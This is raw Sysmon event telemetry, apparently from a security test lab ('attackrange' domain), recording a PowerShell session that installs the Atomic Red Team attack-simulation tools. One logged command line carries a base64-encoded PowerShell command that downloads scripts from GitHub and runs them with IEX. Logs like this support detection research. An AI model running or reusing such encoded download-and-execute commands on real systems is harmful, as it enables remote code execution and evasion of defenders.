13:54:18.635{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004004Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.635{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-858A-5FCF-C900-000000009101}4904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004003Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.635{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004002Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.635{10ACEC4A-8588-5FCF-C800-000000009101}43964188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-858A-5FCF-C900-000000009101}4904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\fec023c8de0ed58c816cd442e3b4ddfe\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\fec023c8de0ed58c816cd442e3b4ddfe\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662773bc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662139fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66271ecb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64) 154100x80000000000000004001Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.649{10ACEC4A-858A-5FCF-C900-000000009101}4904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\ro1hs4vf\ro1hs4vf.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8587-5FCF-624B-070000000000}0x74b620HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAEkAbgB0AGUAcgBuAGUAdAAgAEUAeABwAGwAbwByAGUAcgBcAE0AYQBpAG4AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBGAGkAcgBzAHQAUgB1AG4AQwB1AHMAdABvAG0AaQB6AGUAIgAgAC0AVgBhAGwAdQBlACAAMgAKAEkARQBYACAAKABJAFcAUgAgAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcgBlAGQAYwBhAG4AYQByAHkAYwBvAC8AaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAC8AbQBhAHMAdABlAHIALwBpAG4AcwB0AGEAbABsAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAuAHAAcwAxACkACgBJAG4AcwB0AGEAbABsAC0AQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQAgAC0ARgBvAHIAYwBlAAoASQBFAFgAIAAoAEkAVwBSACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAHIAZQBkAGMAYQBuAGEAcgB5AGMAbwAvAGkAbgB2AG8AawBlAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAvAG0AYQBzAHQAZQByAC8AaQBuAHMAdABhAGwAbAAtAGEAdABvAG0AaQBjAHMAZgBvAGwAZABlAHIALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAAoASQBuAHMAdABhAGwAbAAtAEEAdABvAG0AaQBjAHMARgBvAGwAZABlAHIAIAAtAEYAbwByAGMAZQAgAC0AUgBlAHAAbwBPAHcAbgBlAHIAIAAiAHMAcABsAHUAbgBrACIAIAAtAEIAcgBhAG4AYwBoACAAIgBsAG8AYwBhAGwALQBtAGEAcwB0AGUAcgAiAA== 11241100x80000000000000004000Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.635{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ro1hs4vf\ro1hs4vf.cmdline2020-12-08 13:54:18.635 11241100x80000000000000003999Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:18.635{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ro1hs4vf\ro1hs4vf.dll2020-12-08 13:54:18.635 22542200x80000000000000003998Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.492{10ACEC4A-8588-5FCF-C800-000000009101}4396raw.githubusercontent.com0type: 5 github.map.fastly.net;::ffff:151.101.112.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 11241100x80000000000000003997Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.416{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\install-atomicsfolder.ps12020-12-08 13:54:18.416 11241100x80000000000000003996Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.416{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\install-atomicredteam.ps12020-12-08 13:54:18.416 11241100x80000000000000003995Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.416{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Public\Start-AtomicGUI.ps12020-12-08 13:54:18.416 11241100x80000000000000003994Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.416{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Public\New-Atomic.ps12020-12-08 13:54:18.416 11241100x80000000000000003993Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.416{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Public\Invoke-WebRequestVerifyHash.ps12020-12-08 13:54:18.416 11241100x80000000000000003992Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.416{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Public\Invoke-MalDoc.ps12020-12-08 13:54:18.401 11241100x80000000000000003991Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.401{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Public\Invoke-AtomicTest.ps12020-12-08 13:54:18.401 11241100x80000000000000003990Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.401{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Public\Get-AtomicTechnique.ps12020-12-08 13:54:18.401 11241100x80000000000000003989Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.401{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Write-PrereqResults.ps12020-12-08 13:54:18.401 11241100x80000000000000003988Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.401{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Write-KeyValue.ps12020-12-08 13:54:18.401 11241100x80000000000000003987Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.401{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Write-ExecutionLog.ps12020-12-08 13:54:18.401 11241100x80000000000000003986Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.401{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Show-Details.ps12020-12-08 13:54:18.401 11241100x80000000000000003985Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.401{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Replace-InputArgs.ps12020-12-08 13:54:18.401 11241100x80000000000000003984Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.401{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Invoke-Process.ps12020-12-08 13:54:18.401 11241100x80000000000000003983Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.385{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Invoke-KillProcessTree.ps12020-12-08 13:54:18.385 11241100x80000000000000003982Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.385{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Invoke-ExecuteCommand.ps12020-12-08 13:54:18.385 11241100x80000000000000003981Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.385{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Invoke-CheckPrereqs.ps12020-12-08 13:54:18.385 11241100x80000000000000003980Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.385{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Get-TargetInfo.ps12020-12-08 13:54:18.385 11241100x80000000000000003979Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.385{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Get-PrereqExecutor.ps12020-12-08 13:54:18.385 11241100x80000000000000003978Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.385{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\AtomicClassSchema.ps12020-12-08 13:54:18.385 11241100x80000000000000003977Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:18.385{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\LICENSE.txt2020-12-08 13:54:18.385 354300x80000000000000003976Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:16.496{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50357-false151.101.112.133-443https 22542200x80000000000000004030Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:17.603{10ACEC4A-8588-5FCF-C800-000000009101}4396codeload.github.com0::ffff:140.82.121.10;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x80000000000000004029Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:17.417{10ACEC4A-8588-5FCF-C800-000000009101}4396github.com0::ffff:140.82.121.4;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 354300x80000000000000004028Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:17.418{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50358-false140.82.121.4lb-140-82-121-4-fra.github.com443https 22542200x80000000000000004032Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:19.110{10ACEC4A-8588-5FCF-C800-000000009101}4396onegetcdn.azureedge.net0type: 5 onegetcdn.ec.azureedge.net;type: 5 cs9.wpc.v0cdn.net;::ffff:152.199.19.161;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 354300x80000000000000004031Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:17.604{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50359-false140.82.121.10lb-140-82-121-10-fra.github.com443https 354300x80000000000000004034Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:19.111{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50361-false152.199.19.161-443https 354300x80000000000000004033Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:19.100{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50360-false184.24.15.126a184-24-15-126.deploy.static.akamaitechnologies.com443https 22542200x80000000000000004035Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:21.282{10ACEC4A-8588-5FCF-C800-000000009101}4396www.powershellgallery.com0type: 5 powershellgallerytrafficmanager.trafficmanager.net;type: 5 psg-prod-centralus.cloudapp.net;::ffff:168.61.186.235;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 354300x80000000000000004039Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:22.105{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50365-false168.61.186.235-443https 354300x80000000000000004038Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:21.964{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50364-false184.24.15.126a184-24-15-126.deploy.static.akamaitechnologies.com443https 354300x80000000000000004037Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:21.408{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50363-false168.61.186.235-443https 354300x80000000000000004036Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:21.197{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50362-false184.24.15.126a184-24-15-126.deploy.static.akamaitechnologies.com443https 354300x80000000000000004041Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:22.614{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50367-false168.61.186.235-443https 354300x80000000000000004040Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:22.482{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50366-false184.24.15.126a184-24-15-126.deploy.static.akamaitechnologies.com443https 354300x80000000000000004042Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:23.491{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50370-false168.61.186.235-443https 354300x80000000000000004043Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:24.954{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50371-false168.61.186.235-443https 354300x80000000000000004054Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:25.908{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50372-false168.61.186.235-443https 11241100x80000000000000004053Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:27.642{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\442707434\powershell-yaml\Tests\powershell-yaml.Tests.ps12020-12-08 13:54:27.642 11241100x80000000000000004052Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:27.642{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\442707434\powershell-yaml\lib\netstandard1.3\YamlDotNet.dll2020-12-08 13:54:27.642 11241100x80000000000000004051Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:27.642{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\442707434\powershell-yaml\lib\net45\YamlDotNet.dll2020-12-08 13:54:27.642 11241100x80000000000000004050Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:27.626{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\442707434\powershell-yaml\lib\net35\YamlDotNet.dll2020-12-08 13:54:27.626 11241100x80000000000000004049Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:27.626{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\442707434\powershell-yaml\Load-Assemblies.ps12020-12-08 13:54:27.626 11241100x80000000000000004048Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:27.610{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\niu2bfmp\lib\net45\YamlDotNet.dll2020-12-08 13:54:27.610 11241100x80000000000000004047Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:27.610{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\niu2bfmp\lib\netstandard1.3\YamlDotNet.dll2020-12-08 13:54:27.610 11241100x80000000000000004046Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:27.595{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\niu2bfmp\lib\net35\YamlDotNet.dll2020-12-08 13:54:27.595 11241100x80000000000000004045Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:27.595{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\niu2bfmp\Tests\powershell-yaml.Tests.ps12020-12-08 13:54:27.595 11241100x80000000000000004044Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:27.595{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\niu2bfmp\Load-Assemblies.ps12020-12-08 13:54:27.595 10341000x80000000000000004069Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:28.719{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8594-5FCF-CB00-000000009101}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004068Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 